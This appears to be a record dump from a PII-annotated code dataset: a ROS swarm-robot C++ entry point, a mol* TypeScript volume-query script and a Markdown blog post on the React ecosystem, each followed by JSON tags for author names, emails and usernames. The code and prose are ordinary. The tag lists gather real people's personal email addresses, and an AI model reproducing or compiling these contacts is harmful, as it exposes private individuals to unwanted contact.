[{"tag": "EMAIL", "value": "gustavo.valiente@protonmail.com", "start": 42, "end": 73, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This software is provided 'as-is', without "}, {"tag": "NAME", "value": "Gustavo Valiente", "start": 25, "end": 41, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This softwa"}]
|
/**
* @file main.cpp
* @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)
* @brief Main node that processes an input image and assign goal points to all robots in swarm based off of user input. This implementation uses the RefineGoalPoints method of the ImageProcessor Class.
* @version 0.1
* @date 2021-12-11
* @copyright Copyright (c) 2021
*
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this
* software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#include "../include/swarm_server.h"
#include "../include/image_processor.h"
int main(int argc, char** argv) {
if (argc <= 1) {
ROS_WARN_STREAM
("Enter the # of Robots (robots_) and absolute Image File Path.");
return 1;
}
ros::init(argc, argv, "main");
// Process the image
cv::Mat image = cv::imread(argv[2]);
auto img = new ImageProcessor(image);
auto bin = img->GetEdges();
img->RefineGoalPoints(std::atoi(argv[1]), bin);
auto points = img->TransformToMapCoordinates();
ROS_INFO_STREAM("Got " << points.size() << " goal points!");
// Publish the goal points to the robots
SwarmServer swarm;
swarm.num_agents = std::atoi(argv[1]);
ROS_INFO_STREAM("Kernel size: " << img->GetKernalSize());
swarm.AssignGoals(points);
}
|
C++
|
BSD-3-Clause
|
ShonBC/allstar/src/main.cpp
|
d304f89b-ef5a-4a5f-86cf-04b64e9e57df
|
[{"tag": "NAME", "value": "Pooja Kabra", "start": 102, "end": 113, "context": "s3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node tha"}, {"tag": "NAME", "value": "Shon Cortes", "start": 33, "end": 44, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@um"}, {"tag": "NAME", "value": "Sameer Pusegaonkar", "start": 65, "end": 83, "context": "in.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.um"}, {"tag": "EMAIL", "value": "sameer@umd.edu", "start": 85, "end": 99, "context": "on Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief"}, {"tag": "EMAIL", "value": "pkabra@terpmail.umd.edu", "start": 115, "end": 138, "context": "Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node that processes an input imag"}, {"tag": "EMAIL", "value": "scortes3@umd.edu", "start": 46, "end": 62, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabr"}]
|
[{"tag": "NAME", "value": "Pooja Kabra", "start": 102, "end": 113, "context": "s3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node tha"}, {"tag": "NAME", "value": "Shon Cortes", "start": 33, "end": 44, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@um"}, {"tag": "NAME", "value": "Sameer Pusegaonkar", "start": 65, "end": 83, "context": "in.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.um"}, {"tag": "EMAIL", "value": "sameer@umd.edu", "start": 85, "end": 99, "context": "on Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief"}, {"tag": "EMAIL", "value": "pkabra@terpmail.umd.edu", "start": 115, "end": 138, "context": "Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node that processes an input imag"}, {"tag": "EMAIL", "value": "scortes3@umd.edu", "start": 46, "end": 62, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabr"}]
|
#!/usr/bin/env node
/**
* Copyright (c) 2018-2019 mol* contributors, licensed under MIT, See LICENSE file for more info.
*
* Taken/adapted from DensityServer (https://github.com/dsehnal/DensityServer)
*
* @author David Sehnal <david.sehnal@gmail.com>
* @author Alexander Rose <alexander.rose@weirdbyte.de>
*/
import * as fs from 'fs';
import { configureLocal } from './config';
import * as LocalApi from './server/local-api';
const config = configureLocal();

// When --jobsTemplate is requested, print a sample jobs file to stdout
// and exit immediately (the sample output is unchanged byte-for-byte).
if (config.jobsTemplate) {
    const exampleJobs: LocalApi.JobEntry[] = [
        {
            source: { filename: 'g:/test/mdb/xray-1tqn.mdb', name: 'xray', id: '1tqn' },
            query: {
                kind: 'box',
                space: 'cartesian',
                bottomLeft: [-42.996, -64.169, -45.335],
                topRight: [8.768, 15.316, 21.599]
            },
            params: { forcedSamplingLevel: 2, asBinary: true },
            outputFolder: 'g:/test/local-test'
        },
        {
            source: { filename: 'g:/test/mdb/emd-8116.mdb', name: 'em', id: '8116' },
            query: { kind: 'cell' },
            params: { detail: 4, asBinary: true },
            outputFolder: 'g:/test/local-test',
            outputFilename: '8116_cell.bcif'
        }
    ];
    console.log(JSON.stringify(exampleJobs, null, 2));
    process.exit();
}
/**
 * Load the jobs file named by `config.jobs` and run all jobs locally.
 * Parse/read failures are reported and abort the run.
 */
async function run() {
    let jobs: LocalApi.JobEntry[];
    try {
        if (!config.jobs) {
            throw new Error(`Please provide 'jobs' argument. See [-h] for help.`);
        }
        jobs = JSON.parse(fs.readFileSync(config.jobs, 'utf-8'));
    } catch (e) {
        console.error('' + e);
        return;
    }
    await LocalApi.run(jobs);
}

// Bug fix: the original fired `run();` without handling rejection — an
// error thrown inside LocalApi.run (outside run's try/catch) surfaced as
// an unhandled promise rejection. Report it and exit non-zero instead.
run().catch(e => {
    console.error('' + e);
    process.exit(1);
});
|
TypeScript
|
MIT
|
azangru/molstar/src/servers/volume/query.ts
|
2db113b5-5b1d-4d6e-878a-46230b85e43a
|
[{"tag": "NAME", "value": "Alexander Rose", "start": 267, "end": 281, "context": " David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs"}, {"tag": "NAME", "value": "David Sehnal", "start": 218, "end": 230, "context": "//github.com/dsehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Ros"}, {"tag": "EMAIL", "value": "david.sehnal@gmail.com", "start": 232, "end": 254, "context": "sehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdb"}, {"tag": "EMAIL", "value": "alexander.rose@weirdbyte.de", "start": 283, "end": 310, "context": "avid.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs from 'fs';\nimport { configur"}]
|
[{"tag": "NAME", "value": "Alexander Rose", "start": 267, "end": 281, "context": " David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs"}, {"tag": "NAME", "value": "David Sehnal", "start": 218, "end": 230, "context": "//github.com/dsehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Ros"}, {"tag": "EMAIL", "value": "david.sehnal@gmail.com", "start": 232, "end": 254, "context": "sehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdb"}, {"tag": "EMAIL", "value": "alexander.rose@weirdbyte.de", "start": 283, "end": 310, "context": "avid.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs from 'fs';\nimport { configur"}]
|
## react ecosystem : react, redux, relay, graphql, react-native
I have given some time to explore the react ecosystem since last Friday. Since react is too big a technology stack to learn completely in one week, I wanted to understand the core concepts behind it. I have a bit of experience in full-stack web apps using SAP technologies (past 3 years): webdypro applications (frontend is a drag-and-drop UI library + backend completely in ABAP); CRM webui; Hybris (an e-commerce platform - front end is java & js stack + backend is SAP CRM); extensive experience in webservices and API's; a bit of learned knowledge on Fiori app development using the SAPUI5 library on HCP. My curiosity for learning has drawn me towards open source libraries and frameworks. I have been fascinated by the concept of open source and its potential impact in the world of computer technologies; I have started exploring it bit-by-bit.
I always follow my below table to get a gist of anything new in technology:
____________________________
| Hacker News | Medium | Reddit | Quora-QA | Stack-Overflow QA| Awesome-gh | Online-Courses (lynda.com)| Official-Docs |
| ------------- |:-------------:| -----:| -----:|-----:|-----:|-----:| -----:|
| [react](https://hn.algolia.com/?query=react&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [react](https://medium.com/tag/react?source=related) | [react](https://www.reddit.com/r/reactjs/) | [react](https://www.quora.com/topic/React-JavaScript-library) | [react](https://stackoverflow.com/search?q=react) | [react](https://github.com/enaqx/awesome-react) | [react](https://www.lynda.com/React-js-training-tutorials/7049-0.html) | [react](https://reactjs.org/) |
| [redux](https://hn.algolia.com/?query=redux&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [redux](https://medium.com/tag/redux) | [redux](https://www.reddit.com/r/reduxjs/) | [redux](https://www.quora.com/topic/Redux-JavaScript-library) | [redux](https://stackoverflow.com/search?q=redux) | [redux](https://github.com/xgrommx/awesome-redux) | [redux](https://www.lynda.com/Redux-tutorials/11496-0.html) | [redux](http://redux.js.org/) |
| [relay](https://hn.algolia.com/?query=relay&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [relay](https://medium.com/tag/relay) | [relay](https://www.reddit.com/r/relay/) | [relay](https://www.quora.com/topic/Relay-JS-Framework) | [relay](https://stackoverflow.com/search?q=relay) | [relay](https://github.com/expede/awesome-relay) | [relay](https://www.lynda.com/GraphQL-tutorials/650000-0.html) | [relay](https://facebook.github.io/relay) |
| [graphql](https://hn.algolia.com/?query=graphql&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [graphql](https://medium.com/tag/graphql) | [graphql](https://www.reddit.com/r/graphql/) | [graphql](https://www.quora.com/topic/GraphQL) | [graphql](https://stackoverflow.com/search?q=graphql) | [graphql](https://github.com/chentsulin/awesome-graphql) | [graphql](https://www.lynda.com/GraphQL-tutorials/650000-0.html) | [graphql](http://graphql.org/) |
| [react-native](https://hn.algolia.com/?query=react%20native&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [react-native](https://medium.com/tag/react-native) | [react-native](https://www.reddit.com/r/reactnative/) | [react-native](https://www.quora.com/topic/React-Native-1) | [react-native](https://stackoverflow.com/search?q=react+native) | [react-native](https://github.com/jondot/awesome-react-native) | [react-native](https://www.lynda.com/React-Native-tutorials/11718-0.html) | [react-native](https://facebook.github.io/react-native/) |
********************************************************
*******************************************************
React is an elegant JavaScript library for building frontend user interfaces. React allows developers to create large web-applications that use data and can change over time without reloading the page. It aims primarily to provide speed, simplicity, and scalability. React processes only user interfaces in applications. This corresponds to View in the Model-View-Controller (MVC) pattern, and can be used in combination with other JavaScript libraries or frameworks in MVC, such as AngularJS. [Source : wikipedia]
React was created by Jordan Walke, a software engineer at Facebook. He was influenced by Angular and XHP, an HTML component framework for PHP. It was first deployed on Facebook's newsfeed in 2011 and later on Instagram.com in 2012. It was open-sourced at JSConf US in May 2013.
React is maintained by Facebook, Instagram and a community of individual developers and corporations.
There are almost 2K blogs, articles and tutorials teaching about react every month and it is the most trending buzzword in the Hacker News community. Stack Overflow has released its much-anticipated Developer Survey for 2017. This year, over 64,000 developers took part in the survey and shared their preferences. Below are the stats for the survey on frameworks and libraries; react stands in the top list.

React has been adopted by top giants Facebook, Instagram, Netflix, NY Times, Khan Academy, Codecademy, WhatsApp, Vivaldi Browser, Dropbox, Yahoo Mail, many [more](https://github.com/facebook/react/wiki/sites-using-react) startups and it is going to take over the web.
React is just a front-end UI library, in order to build a complete full stack react application we will have to use supporting frameworks. Facebook and other communities provides supporting libraries and frameworks, such as flux, redux, relay, graphql. React can also be used with other frameworks ex: angularjs.
Lets explore them in details...
## React:
As explained already react is only the View layer, which is means you have only the V in the MVC — Model-View-Controller architecture. All the while we see that React is mentioned along with other frameworks, but it offers just the View. React views are typically rendered using components that contain additional components specified as custom HTML tags.
React gives us the template language and a few function hooks to render HTML. Since it is component based, we can compose an application with React, and just specify how we want our component to look like.
React will keep it updated; even the underlying data changes. The core principles of React are (1) Flexibility, (2) Efficiency and (3) Declarative code.
As React is flexible, we can use it in several projects, create new apps and even use it within an existing code base, without doing a rewrite. React is efficient because it uses a virtual DOM. The virtual DOM compares the current setup to the desired setup, and only makes the minimal amount of changes required to get there. Being efficient is increasingly important in the new world of mobile devices: it helps conserve battery power as well as create a faster and more pleasant user experience.

The reason behind to build React.js :
* React is not a MVC framework : React is a library for building composable user interfaces..
* React doesn’t use templates : React uses a real, full featured programming language to render views, which we see as an advantage over templates for a few reasons:
* JavaScript is a flexible, powerful programming language with the ability to build abstractions. This is incredibly important in large applications.
* By unifying your markup with its corresponding view logic, React can actually make views easier to extend and maintain.
* By baking an understanding of markup and content into JavaScript, there’s no manual string concatenation and therefore less surface area for XSS vulnerabilities. JSX, an optional syntax extension, is also available in case you prefer the readability of HTML to raw JavaScript.
* React updates are very simple : When your component is first initialized, the method is called, generating a lightweight representation of your view. From that representation, a string of markup is produced, and injected into the document. When your data changes, the method is called again. In order to perform updates as efficiently as possible, we diff the return value from the previous call to render with the new one, and generate a minimal set of changes to be applied to the DOM(Document Object Model).
In simple words ,for example : In your facebook page, you don’t have to refresh every time to get a new notification. it just updates without that.
* Because React has its own lightweight representation of the document, we can do some pretty cool things with it:
* Facebook has dynamic charts that render to `<canvas>` instead of HTML.
* Instagram is a “single page” web app built entirely with React and Backbone.Router.
* They have built internal prototypes that run React apps in a web worker and use React to drive native iOS views via an Objective-C bridge.
* You can run React on the server for SEO, performance, code sharing and overall flexibility.
Events behave in a consistent, standards-compliant way in all browsers (including IE8) and automatically use event delegation.
There are a few prerequisites and key concepts we need to master before we start building apps.
Familiarity with HTML, JavaScript and ECMAScript6 (ES6).
and the key concepts are:
* Components
* JSX
* Props & State
* The Component API
* Component Types
This blogpost [Master these five concepts, then master React](https://medium.freecodecamp.org/the-5-things-you-need-to-know-to-understand-react-a1dbd5d114a3) gives complete overview on above five key-concepts.
Brief summary:
* A React codebase is made up of components.
* These components are written using JSX.
* Data flows from parent to children, except when it comes to state, which originates inside a component.
* Components possess a small set of lifecycle and utility methods.
* Components can also be written as pure functions.
* You should keep data logic and UI logic in separate components.
* Higher-order components are a common pattern for giving a component access to new tools.
More on react basics:
* [All the fundamental React.js concepts, jammed into this single Medium article](https://medium.freecodecamp.org/all-the-fundamental-react-js-concepts-jammed-into-this-single-medium-article-c83f9b53eac2)
* [How Virtual-DOM and diffing works in React](https://medium.com/@gethylgeorge/how-virtual-dom-and-diffing-works-in-react-6fc805f9f84e)
* [react-basic](https://github.com/reactjs/react-basic)
**What is Flux?**
-------
We learnt that React takes care of V or the View part in MVC. Now, what about the M or the Model part? Flux, a programming pattern takes care of the M in the MVC.
It is the architecture responsible for creating data layers in JavaScript applications and building client-side web applications. Flux complements React’s Composable view components through its unidirectional data flow.
We can also say that Flux is more of a pattern, than a framework and it has four main components (we will go in depth later):
* Dispatcher
* Stores
* Views (React components)
* Action
This is not like the general MVC that you see in other frameworks. But yes, there are Controllers, but they are mostly Controller views. Views are at the top of the hierarchy and they retrieve the data and functionality and pass them down to their children.
Flux follows the concept of unidirectional data flow making it much easier to zero in of where the error lies. The data goes through a strict pipeline through your application. React and Flux are actually two of the most popular frameworks that follow the concept of unidirectional data flow.
While React makes uses of a virtual DOM object to render changes, Flux does it differently. In Flux, the interactions with user interface will trigger a series of actions that would alter the application data. The View will get alerts on the changes.

**Flux vs. MVC**
Now that we have both MVC and Flux patterns, the next question would be which one is a better choice. Let’s go a little deeper into this:
There are different kinds of MVC patterns, but the basic concept of each one remains the same:
* Model — Maintains the behavior & data of an application domain
* View — The display of the model in UI
* Controller — Uses the user input, manipulate the model & update the view

The main problem with MVC is that it doesn’t scale well for Facebook’s huge code base. Flux proved to be a better choice because it is all about tweaking the flow inside the app. MVC has stood the test of time, and ever since its launch in 1976, it has been the favorite for many developers. Even in the recent years, developers have been using for several projects. But MVC couldn’t handle code base that Facebook needed, and hence Flux started ruling the roost.
Let’s take a look at the main factors due to which Flux has an upper hand over MVC design pattern.
The Flow — Flux is quite strict about the flow of application. The data Dispatcher puts forth some strict rules and exceptions to govern the flow. There is no such thing in MVC, and the flows are implemented differently.

Unidirectional Flow in Flux — While MVCs are bidirectional in their flow, in Flux, all the changes goes in the same direction through data Dispatcher. The Store cannot change by itself, this is the same concept for all other Actions. Changes to be made have to go through the Dispatcher through Actions.
Store — While MVC cannot model single objects, Flux can do it to store any application related data.
When it comes to choosing Flux or MVC, Flux would be a better choice because it is very easy to understand and works with very minimum code usage. Flux allows you to structure your app effectively.
This is something to look forward to because React’s programming language is integrated with a very huge code base that is seemingly endless and a huge run time complexity that developers just hate.
Once you understand the cons of bidirectional data flow, it would be easier to understand why unidirectional data flow is the best.
In the bidirectional data flow, you have the typical data flow — Model-View-Controller. But when applications became more complex, the Controller begins to feel the burden.
The Controller takes the huge responsibility of maintaining both the application state and the data. Also, the cascading updates makes the app really difficult to understand and debug. In the end, you have an application whose results are totally unpredictable.
With unidirectional data flow, this problem is mitigated, and eventually, predictable application state is achieved. When the data flow is unidirectional, changes in the application view layer will trigger an action in the data layer. These changes will then be reflected in the View. The View does not directly affect application data.
[[more on flux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01-react-ecosystem/Flux-architecture.md)]
## Redux
[Redux](http://redux.js.org/) is one of the popular implementations of facebook's flux architecture discussed above. However there are slight differences in dispatcher and data-flow part.
According to Github, Redux is a predictable state container for JavaScript apps. Many of the concepts are similar to functional programming, and all the data is kept in a single store. .
Irrespective of the application size, Redux is always a single object, quite unlike Flux, which keeps separate stores for different kinds of data. If there are manipulations to be made on the data, it doesn’t affect the state. In this way, the state is immutable.
All updates and manipulation are done on a state tree. But this does not make the application slow as the data can be shared along several versions of the state tree.
The updates on the application state is done through Actions, which are plain objects themselves, but contains a type property depicting the kind of action performed. The data that describes the action will also be included.
The Store’s Dispatcher will dispatch the action and from there, it goes to the Reducer, and then to the current state tree. Here, the actions of the application would be described — the different things the application can do. Just a single reducer would be enough for the state transformation and action.
[[more on redux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01-react-ecosystem/Redux.md)]
## Relay & GraphQL
As discussed above Flux and Redux are data handling patterns to keep our UI in sync. When a user interaction happens, they update the state and trigger rerendering.
But, how do we get the data that a component needs from a server, and then update the server when the user makes changes?
Relay takes care of this problem. It makes it easy to fetch data from the server as part of our data flow. In order to do this, Relay needs to know what data each component needs from the server. This is where GraphQL comes in.
> [Relay](https://facebook.github.io/relay/docs/getting-started.html) is an open source project by Facebook that exposes a framework they have been using internally for years. It is the glue that binds components written in React to data fetched from a GraphQL server.
> [GraphQL](http://graphql.org), a query language that is starting to get more and more attention. Facebook, who internally used GraphQL since 2012 and released a first specification and reference implementation of GraphQL in 2015 announced GraphQL to be [production ready] in September 2016. What followed is a trend of more and more companies starting to use GraphQL, such as [GitHub](https://youtu.be/hT-4pVmkGt0), [Coursera](https://youtu.be/JC-UJwBKc2Y) and [Shopify](https://youtu.be/Wlu_PWCjc6Y).
> One of the main benefits of using GraphQL is how so called queries allow clients to specify their data requirements in a declarative way. Instead of collecting all the data from different endpoints, as is usual with REST, queries allow an exact and fine-grained selection of data fields that are then resolved by the server. This leads to prevention of data over- and underfetching, two common problems of REST.
> Facebook developed graphql to provide a data source that can evolve without breaking existing code and to favor speed on low-powered and low-quality mobile devices. The schema can evolve, but should never break. Products are described in graphs and queries, instead of the REST notion of endpoints.
> A query might be resolved by multiple data sources: REST APIs, database, a flat JSON file. A product might begin by returning data from a simple CSV file, and later be grow to return data from a cluster of databases or remote storage like BigTable.
> GraphQL is simply a clearinghouse for queries. It also comes with a tool called GraphiQL that allows you to view and debug your queries visually. And Facebook has open-sourced a library, called DataLoader, that makes it easy to query multiple backends asynchronously without having to write custom Promise logic that ends up in callback hell.
> Relay acts as a partner to GraphQL and React. A top-level query usually happens on a route — a URL pattern that loads a component when it is matched.
> GraphQL “fragments” are co-located with your React components. A component describes what slices of data it needs on certain types. Relay queries “spread” the fragments of other components. In this particular case, the “slug” is extracted from the URL path and passed to our GraphQL query. The Page component will be populated with a “viewer” prop that contains the data specified.
> As React components become more nested, queries can become increasingly complex. In Relay Classic, all of the query-parsing logic happened at runtime. As of [Relay Modern](https://facebook.github.io/relay/docs/relay-modern.html), queries are now parsed at build time and are static at runtime. This is great for performance.
When we build React components, it’s easy to reuse them across different parts of our site. This is one of the main benefits of React. It’s called composability.If our component needs to use data from the server, though, it gets harder to just drop a component in place. The server needs to know what properties the component needs. In many apps, this will be hard-coded on the server. There will be a URL (called an endpoint) that passes down data for that particular view. The endpoint code will know exactly what properties its view needs.
The problem here is that whenever we add (or remove) properties from the component, we have to change the server code too. This is called coupling; when we change one, we have to change the other, too.
Because we have to manually keep these two in sync, it makes bugs and obsolete code more likely.
* Bugs come from underfetching data. we don’t pull down the properties that we need for a component because you forgot to add them to the server.
* Obsolete code results in overfetching data. For example, let’s say you remove a component from the tree. Do you delete its properties from the server response? How can we be sure another component doesn’t use that endpoint and need those properties? Instead, it’s better to just keep them in the response… but then we have a lot of cruft lying around.
With GraphQL, we don’t hard-code the server with the list of properties that our view needs. Instead, the component provides a list of what it needs to the server.
This list is combined with the lists from other components. The structure of the combined list is a tree, just like the component tree. It gets handed off to the endpoint. There’s only one endpoint and it handles all requests.
The nice thing about this is that it localizes changes. When we need to add or remove a property, we only need to change the component… not the server.
* [complete tutorial on graphql](https://www.howtographql.com/basics/2-core-concepts/)
* [relay-graphql explained in fun cortoon way by Lin, part 1, 2, 3](https://code-cartoons.com/a-cartoon-intro-to-facebook-s-relay-part-1-3ec1a127bca5)
Next steps : [building pokedex](https://github.com/shekhargulati/52-technologies-in-2016/blob/master/43-graphql/README.md)
## React Native
React Native is a framework developed by Facebook. It allows us to create real mobile applications identical to an application built using Swift or Java. The same fundamental UI building blocks used by iOS and Android are used by React Native. These building blocks are just put together using JavaScript and React.
React-Native has been around for about 2 years(initial release in 2015).
Facebook’s React Native user interface (UI) design framework is on the leading edge of this technology. React Native is a partnership between everything you’re used to from React on the web and the benefits of native applications. It provides you the speed, fidelity, and feel of native applications while retaining what you are used to from React on the web, like fast development cycles and declarative self-contained UI components.
**How is React Native different from React?**
React Native is not a different version of React. React Native is a custom renderer for React, just like React DOM on The Web. React Native uses native components instead of web components like React as building blocks. To begin with React Native, you need to know the basic React concepts, like JSX, components, state, and props. If you know React, you still need to learn stuff specific to React Native, like the native components. React Native also gives access to the features these platforms offer, apart from transforming React code to work on iOS and Android.
**How does React Native work?**
If you are familiar with React for the web, you’ll feel right at home with React Native. If you are used to writing apps in Java or Swift, you’ll feel right at home with many of React Native’s components.
React is a JavaScript library for building user interfaces, focusing on the view portion of your application. This means when you write a React Native app, your view code will feature React components, which are small pieces of code describing how a portion of your app should look based on some set of input data.
**Companies which have worked with React Native**
Facebook, GitHub, Airbnb, Box, Google, Microsoft, Pinterest, Pixar Animation Studios, Twitter, Uber, Instagram, LinkedIn, and WhatsApp all use React code. [more](https://facebook.github.io/react-native/showcase.html)
**Benefits**
* Cross-platform Android and iOS have different codebases, so businesses often have to hire engineers to work on both platforms. With React Native you don’t have to build the same application for iOS and Android, separately. React Native helps developers reuse the common logic layer across the web, mobile, and other operating systems.
* Truly native Writing applications for a specific operating system is defined as native app creation. Many software frameworks let you believe in its ability to create good applications for Android and iOS, but most often than not the product ends up somewhere in between, without feeling truly native to either. React Native enables developers to make truly native apps, by embracing native platforms while allowing your app to share the majority of its codebase between platforms, without the increase in budget building two separate apps would entail.
* Readability Even to those unfamiliar with React, it is easily readable. Many frameworks require you to learn an extensive list of concepts which are only useful within the framework. React strives to do the opposite.
* Declarative style In declarative programming, developers tell an application what they are trying to achieve. While with imperative programming, a developer has to specify exactly how to do it. In this style of programming you have less flexibility in how things occur but being able to describe the state reduces the possibility of bugs drastically.
* The component-based structure allows a web-style approach to development. React Native’s component-based structure allows developers to build apps with a more agile, web-style approach to development than most hybrid frameworks, and without any web at all.
* Community Backing The majority of your React Native code is JavaScript, so you reap the benefit of all the advancements in the language and its ecosystem. If you know JavaScript, React Native will be easy to pick-up, allowing most front-end web developer to be a mobile developer. All you need to know is JavaScript, platform APIs, some native UI elements, and any other platform-specific design patterns and you’re set.
* Reloading Instead of recompiling, you can reload your app instantly. You’re given two options: Live Reloading will reload the app every time you edit and save one of its files. Hot Reloading only reloads the file you just edited, not the entire file.
* Use native code when you need to It's simple to drop down to native code if you need to optimize a few aspects of your application. It's also easy to build part of your app in React Native, and part of your app using native code directly, its how the Facebook app works.
* No need to overhaul old app All you have to do is add React Native UI components into your existing app’s code, without having to rewrite. Or with a plugin, reuse the Cordova-based code if your current hybrid app was built using Cordova and Ionic. This is a significant advantage for businesses looking to expand an existing app without having to overhaul it.
* Efficiency Native app development usually means inefficiency, slower time to deployment, and less developer productivity. React Native is all about bringing high speed, responsiveness, and agility of web app development along with effectual processing and best user experience to the hybrid space, to provide your users with a native app experience.
React native isn’t just an introduction to native applications for web developers. It is a powerful tool, but not ideal for every solution. Remember, complex apps require more native solutions which in turn need more native developers. Else, it could slow down the development process. However, React Native is the best approach for applications with less complex UI. You will get a well performant, truly native app with fewer resources spent.
[Source: [react-native](https://www.cognitiveclouds.com/insights/all-you-need-to-know-about-react-native/)]
## Next steps:
* I will keep this article updated with my new findings.
* I have experimented some of the basic react-redux apps while going through tutorials in [Codepen](https://codepen.io/kr_gopala/)
* to develop a complete full stack web application using react+ redux + graphql and deploy it on heroku.
* to build a native hacker news app similar to [hackernews-react-graphql](https://github.com/gopala-kr/hackernews-react-graphql) and deploy it on app store and google play store.
(this will be an another post)
|
Markdown
|
MIT
|
gopala-kr/10-weeks/Projects-Blogs/01-react-ecosystem/README.md
|
d5d0b9a9-2191-4109-a3fc-fe24a705e256
|
[{"tag": "USERNAME", "value": "@gethylgeorge", "start": 10583, "end": 10596, "context": "OM and diffing works in React](https://medium.com/@gethylgeorge/how-virtual-dom-and-diffing-works-in-react-6fc805"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 16816, "end": 16825, "context": " and action.\n\n[[more on redux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 29307, "end": 29316, "context": " to [hackernews-react-graphql](https://github.com/gopala-kr/hackernews-react-graphql) and deploy it on app st"}, {"tag": "USERNAME", "value": "gopala-kr", "start": 15327, "end": 15336, "context": "ication data.\n\n[[more on flux](https://github.com/gopala-kr/weekend-with-github/blob/master/Projects-Blogs/01"}, {"tag": "USERNAME", "value": "kr_gopala", "start": 29097, "end": 29106, "context": "through tutorials in [Codepen](https://codepen.io/kr_gopala/)\n* to develop a complete full stack web applicat"}, {"tag": "NAME", "value": "Jordan Walke", "start": 4343, "end": 4355, "context": "larJS. [Source : wikipedia]\n\nReact was created by Jordan Walke, a software engineer at Facebook. He was influenc"}]
|
